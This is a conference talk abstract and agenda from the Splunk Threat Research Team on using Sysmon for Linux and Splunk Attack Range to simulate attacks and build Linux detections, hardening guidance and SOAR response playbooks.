The release of Microsoft Sysmon for Linux gives defenders new opportunities for monitoring, management, and detection development focusing on Linux operating systems.  The Splunk Threat Research Team has developed several analytic stories addressing Linux threat detection. In this presentation, presenters showcase how to use the latest Splunk Attack Range in order to replicate, record, analyze and develop detections based on Linux Sysmon data. We will also cover the importance of monitoring and hardening Linux systems, as well as available Splunk SOAR tools in order to automate investigation and response.

• $whoami
• Why Linux
• Linux Sysmon TA
• Splunk Attack Range Intro
• Splunk Attack Range – building a Linux environment for threat replications, simulation and research
• Detecting Linux Exploitation
• Detecting Linux Post-Exploitation
• Splunk SOAR playbooks for investigating and automating defense
• Q&A